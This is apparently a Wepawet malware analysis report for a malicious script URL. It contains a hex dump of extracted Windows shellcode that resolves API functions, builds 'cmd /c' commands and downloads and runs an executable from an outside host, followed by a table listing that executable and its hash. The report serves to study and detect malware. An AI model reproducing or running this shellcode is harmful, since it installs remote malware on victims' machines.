... !!I..,]q.. !
!..)..N !!I.w..q
.. !!..)..z !!I.
.%~q.W !!..)....
..IYI.=q.C !!..)
... !!I...Aq.o !
!..)..> !!I.h..q
.. !!..)......I.
..?q.. !!..)....
..Ix..#q.3 !!..)
...!!!I_..Rq..!!
!..)...!!!I....q
..!!!..)......Iv
...q..!!!..).._.
..I;[?#q..!!!..)
..K...I.z..q..!!
!..)..w...I....q
..!!!..)..c...II
...q..!!!..)..v!
!!IS..7q.S!!!..)
..e....2KDq.....
q...............
......In.n$q..!!
!..)...!!!I.o/.q
..!!!..)...E.a..
.Y1..a-..Q=...a)
..*..a...]..a..A
..M....d...u$Y".
..k9..{."...h...
.".........U&..,
".....]..T...{."
.G..-j..{="...%.
"...e.=@..G...IU
UQ...VVV.VNVXDRF
N.HOGN.L@L.DYD!!
!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!
!!!!!!!.

90 e8 4d 03 00 00 68 00  20 00 00 6a 00 ff d0 b9 
00 08 00 00 8b f8 eb 05  5e f3 a4 ff d0 e8 f6 ff 
ff ff e8 54 03 00 00 8b  f8 e8 38 00 00 00 e8 64 
01 00 00 e8 46 00 00 00  e8 f2 03 00 00 8b f8 e8 
22 00 00 00 e8 5b 01 00  00 e8 30 00 00 00 e8 a0 
03 00 00 8b f8 e8 0c 00  00 00 e8 78 01 00 00 e8 
1a 00 00 00 eb 58 53 8b  dc 53 6a 40 68 00 10 00 
00 57 e8 c8 02 00 00 e8  fa 00 00 00 58 c3 53 8b 
dc 53 6a 20 68 00 10 00  00 57 e8 b0 02 00 00 e8 
e2 00 00 00 58 c3 57 e8  53 04 00 00 8b f8 33 c9 
49 33 c0 b0 c3 fc f2 ae  8d 47 ff 5f c3 5b 3e c6 
07 b8 3e 89 5f 01 66 3e  c7 47 05 ff e0 c3 e9 ac 
04 00 00 5b 81 ec 14 01  00 00 8b d4 3e c7 02 63 
6d 64 20 3e c7 42 04 2f  63 20 22 3e c7 42 08 63 
6d 64 20 3e c7 42 0c 2f  63 20 22 83 c2 10 33 c0 
50 50 68 04 01 00 00 52  53 50 e8 c8 03 00 00 e8 
72 00 00 00 8b fc 8b c7  83 c0 08 3e 8a 18 84 db 
74 03 40 eb f6 66 3e c7  00 22 22 33 d2 3e 88 50 
02 83 ec 54 33 c0 33 db  8b cc 83 f8 54 7d 09 3e 
89 1c 08 83 c0 04 eb f2  8b cc 8b d9 83 c3 10 33 
c0 3e c7 43 2c 01 00 00  00 51 53 50 50 50 50 50 
50 57 50 e8 3b 03 00 00  e8 19 00 00 00 64 a1 04 
00 00 00 8d a0 60 ff ff  ff e8 39 03 00 00 33 db 
53 53 53 53 ff d0 80 38  e9 74 05 80 38 e8 75 0f 
81 78 05 90 90 41 90 74  06 55 8b ec 8d 40 05 ff 
e0 e8 17 ff ff ff c3 e8  11 ff ff ff b8 11 01 04 
80 c2 0c 00 e8 04 ff ff  ff 33 c0 50 54 e8 54 00 
00 00 50 e8 8b 02 00 00  ff d0 36 80 3c 24 00 77 
0a e8 41 02 00 00 33 ff  57 ff d0 e8 fb 01 00 00 
68 ff 00 00 00 ff d0 e8  d1 fe ff ff 53 57 56 33 
c0 50 54 e8 1e 00 00 00  50 e8 55 02 00 00 ff d0 
36 80 3c 24 00 77 0a e8  0b 02 00 00 33 ff 57 ff 
d0 58 5e 5f 5b c3 eb 02  58 c3 e8 f9 ff ff ff 56 
57 83 ec 08 8b fc 6a 08  57 3e ff 77 14 e8 5d 02 
00 00 ff d0 8b fc 68 61  6d 65 00 68 49 45 46 72 
8b f4 b9 08 00 00 00 f3  a6 75 2f 6a 00 3e ff 74 
24 20 e8 24 02 00 00 ff  d0 8b f8 e8 cb 01 00 00 
ff d0 3b f8 74 08 36 8b  44 24 20 3e ff 00 3e ff 
74 24 1c e8 ef 01 00 00  ff d0 83 c4 10 5f 5e b8 
01 00 00 00 c3 68 6f 6e  00 00 68 75 72 6c 6d eb 
15 8d 44 24 04 50 e8 0b  fe ff ff 50 e8 4a 02 00 
00 e9 e0 fe ff ff e8 e6  ff ff ff 83 c4 08 c3 6a 
6c 68 6e 74 64 6c eb 15  8d 44 24 04 50 e8 e4 fd 
ff ff 50 e8 23 02 00 00  e9 b9 fe ff ff e8 e6 ff 
ff ff 83 c4 08 c3 68 33  32 00 00 68 75 73 65 72 
eb 15 8d 44 24 04 50 e8  ba fd ff ff 50 e8 f9 01 
00 00 e9 8f fe ff ff e8  e6 ff ff ff 83 c4 08 c3 
68 63 76 77 00 68 73 68  64 6f eb 15 8d 44 24 04 
50 e8 90 fd ff ff 50 e8  cf 01 00 00 e9 65 fe ff 
ff e8 e6 ff ff ff 83 c4  08 c3 68 76 67 78 00 eb 
15 8d 44 24 04 50 e8 6b  fd ff ff 50 e8 aa 01 00 
00 e9 40 fe ff ff e8 e6  ff ff ff 83 c4 04 c3 e8 
ab 01 00 00 68 1b c6 46  79 50 e8 c6 01 00 00 83 
c4 08 c3 e8 97 01 00 00  68 ec 97 03 0c 50 e8 b2 
01 00 00 83 c4 08 c3 e8  83 01 00 00 68 aa fc 0d 
7c 50 e8 9e 01 00 00 83  c4 08 c3 e8 6f 01 00 00 
68 ed 56 ef 36 50 e8 8a  01 00 00 83 c4 08 c3 e8 
5b 01 00 00 68 f0 8a 04  5f 50 e8 76 01 00 00 83 
c4 08 c3 e8 f7 fe ff ff  68 78 68 db 1c 50 e8 62 
01 00 00 83 c4 08 c3 e8  33 01 00 00 68 ef ce e0 
60 50 e8 4e 01 00 00 83  c4 08 c3 e8 1f 01 00 00 
68 b0 49 2d db 50 e8 3a  01 00 00 83 c4 08 c3 e8 
36 ff ff ff 68 ab 5e 9b  1e 50 e8 26 01 00 00 83 
c4 08 c3 e8 a7 fe ff ff  68 59 97 81 02 50 e8 12 
01 00 00 83 c4 08 c3 e8  e3 00 00 00 68 7e d8 e2 
73 50 e8 fe 00 00 00 83  c4 08 c3 e8 cf 00 00 00 
68 9e f9 bb 35 50 e8 ea  00 00 00 83 c4 08 c3 e8 
92 fe ff ff 68 57 a0 b5  bb 50 e8 d6 00 00 00 83 
c4 08 c3 e8 7e fe ff ff  68 1a 7a 1e 02 50 e8 c2 
00 00 00 83 c4 08 c3 e8  6a fe ff ff 68 e0 5b 30 
94 50 e8 ae 00 00 00 83  c4 08 c3 e8 56 fe ff ff 
68 97 c9 e2 a3 50 e8 9a  00 00 00 83 c4 08 c3 e8 
42 fe ff ff 68 68 24 c5  b3 50 e8 86 00 00 00 83 
c4 08 c3 e8 57 00 00 00  68 72 fe b3 16 50 e8 72 
00 00 00 83 c4 08 c3 e8  44 fe ff ff eb 13 6a 65 
50 e8 e0 fb ff ff 50 e8  ab fe ff ff e9 b5 fc ff 
ff e8 e8 ff ff ff c3 e8  a9 fd ff ff 68 4f ef 4f 
05 50 e8 3e 00 00 00 83  c4 08 c3 e8 0f 00 00 00 
68 8e 4e 0e ec 50 e8 2a  00 00 00 83 c4 08 c3 33 
c0 64 8b 40 30 85 c0 78  10 3e 8b 40 0c 3e 8b 70 
1c ad 3e 8b 40 08 c3 eb  0b 3e 8b 40 34 83 c0 7c 
3e 8b 40 3c c3 60 36 8b  6c 24 24 36 8b 45 3c 36 
8b 54 28 78 03 d5 3e 8b  4a 18 3e 8b 5a 20 03 dd 
e3 3b 49 3e 8b 34 8b 03  f5 33 ff 33 c0 fc ac 84 
c0 74 07 c1 cf 0d 03 f8  eb f4 36 3b 7c 24 28 75 
df 3e 8b 5a 24 03 dd 66  3e 8b 0c 4b 3e 8b 5a 1c 
03 dd 3e 8b 04 8b 03 c5  36 89 44 24 1c 61 c3 e8 
4f fb ff ff 68 74 74 70  3a 2f 2f 77 77 77 2e 77 
6f 77 79 65 73 67 6f 2e  69 6e 66 6f 2f 6d 61 6d 
2e 65 78 65 00 00

..M...h. ..j....
........^.......
...T......8....d
....F...........
"....[....0.....
...........x....
.....XS..Sj@h...
.W..........X.S.
.Sj h....W......
....X.W.S.....3.
I3.......G._.[>.
..>._.f>.G......
...[........>..c
md >.B./c ">.B.c
md >.B./c "...3.
PPh....RSP......
r..........>....
t.@..f>..""3.>.P
...T3.3.....T}.>
...............3
.>.C,....QSPPPPP
PWP.;........d..
.....`....9...3.
SSSS...8.t..8.u.
.x...A.t.U...@..
................
.........3.PT.T.
..P.......6.<$.w
..A...3.W.......
h...........SWV3
.PT.....P.U.....
6.<$.w......3.W.
.X^_[...X......V
W.....j.W>.w..].
......hame.hIEFr
.........u/j.>.t
$ .$............
..;.t.6.D$ >..>.
t$..........._^.
.....hon..hurlm.
..D$.P.....P.J..
...............j
lhntdl...D$.P...
..P.#...........
......h32..huser
...D$.P.....P...
................
hcvw.hshdo...D$.
P.....P......e..
..........hvgx..
..D$.P.k...P....
..@.............
....h..FyP......
........h....P..
............h...
|P..........o...
h.V.6P..........
[...h..._P.v....
........hxh..P.b
........3...h...
`P.N............
h.I-.P.:........
6...h.^..P.&....
........hY...P..
............h~..
sP..............
h...5P..........
....hW...P......
....~...h.z..P..
........j...h.[0
.P..........V...
h....P..........
B...hh$..P......
....W...hr...P.r
........D.....je
P.....P.........
............hO.O
.P.>............
h.N..P.*.......3
.d.@0..x.>.@.>.p
..>.@....>.@4..|
>.@<.`6.l$$6.E<6
.T(x..>.J.>.Z ..
.;I>.4...3.3....
.t........6;|$(u
.>.Z$..f>..K>.Z.
..>.....6.D$.a..
O...http://www.w
owyesgo.info/mam
.exe..

Additional (potential) malware:

URL	Type	Hash	Analysis
http://www.wowyesgo.info/mam.exe	MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit	135907f2f961bfa7be050f06ee8f848a	Anubis report Virustotal report

Wepawet (alpha)

Analysis report for http://a0v.org/x.js

Sample Overview

Detection results

Exploits

Deobfuscation results

Evals

Writes

Network Activity

Requests

Redirects

ActiveX controls

Shellcode and Malware